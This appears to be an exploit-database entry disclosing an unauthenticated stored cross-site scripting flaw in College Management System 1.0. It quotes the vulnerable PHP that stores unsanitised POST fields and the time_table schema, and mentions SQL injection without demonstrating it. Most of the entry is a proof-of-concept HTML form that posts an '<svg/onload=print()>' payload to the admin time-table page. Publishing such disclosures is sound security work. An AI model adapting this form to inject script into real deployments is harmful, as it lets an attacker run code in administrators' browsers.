Exploit for College Management System 1.0 Cross Site Scripting

Name: Exploit for College Management System 1.0 Cross Site Scripting
Rating: 5 (189 reviews)
2021-10-04 | CVSS -0.1
## https://sploitus.com/exploit?id=PACKETSTORM:164382
# Exploit Title: college management system - Stored Cross-Site Scripting (XSS) Unauthenticated  
# Date: 01/10/2021  
# Exploit Author: Abdulrahman https://twitter.com/infosec_90  
# Vendor Homepage: https://www.eedunext.com/  
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/  
# Version: 1.0  
# Tested on: Kali Linux  
  
  
in admin/time-table.php in line 1 :  
  
  
<?php  
session_start();  
if (!$_SESSION["LoginAdmin"])  
{  
header('location:../login/login.php');  
}  
require_once "../connection/connection.php";  
?>  
  
  
in admin/time-table.php in line 17 - 27 :  
  
$course_code=$_POST["course_code"];  
  
$semester=$_POST["semester"];  
  
$timing_from=$_POST["timing_from"];  
  
$timing_to=$_POST["timing_to"];  
  
$day=$_POST["day"];  
  
$subject_code=$_POST["subject_code"];  
  
$room_no=$_POST["room_no"];  
  
  
is vulnerable to XSS and SqlInjection  
  
  
--  
Table structure for table `time_table`  
--  
  
CREATE TABLE `time_table` (  
`id` int(11) NOT NULL,  
`course_code` varchar(10) NOT NULL,  
`semester` int(11) NOT NULL,  
`timing_from` varchar(10) NOT NULL,  
`timing_to` varchar(10) NOT NULL,  
`day` varchar(20) NOT NULL,  
`subject_code` varchar(20) NOT NULL,  
`room_no` int(11) NOT NULL  
) ENGINE=InnoDB DEFAULT CHARSET=latin1;  
  
  
  
20 char  
  
  
  
POC :  
  
<html lang="en">  
<head>  
<title>XSS</title>  
</head>  
<body class="login-background">  
<!doctype html>  
<html lang="en">  
<head>  
<meta charset="utf-8">  
  
<!-- css style goes here -->  
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">  
  
  
<!-- css style go to end here -->  
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">  
</head>  
<body>  
  
  
  
<div class="modal-dialog modal-lg">  
<div class="modal-content">  
<div class="modal-header bg-info text-white">  
<h4 class="modal-title text-center">Add Time Table</h4>  
</div>  
<div class="modal-body">  
<form action="http://127.0.0.1/2/College-Management-System/Admin/time-table.php" method="post">  
<div class="form-group">  
<div class="formp">  
<label for="exampleInputPassword1">day No:</label>  
<input type="text" name="day" class="form-control" value="5">  
</div>  
</div>  
</div>  
<div class="form-group">  
<div class="formp">  
<label for="exampleInputPassword1">subject_code No:</label>  
<input type="text" name="subject_code" class="form-control" value="<svg/onload=print()>">  
</div>  
</div>  
<div class="modal-footer">  
<input type="submit" class="btn btn-primary" name="btn_save" value="Save Data">  
<button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>  
</div>  
</form>  
</div>  
</div>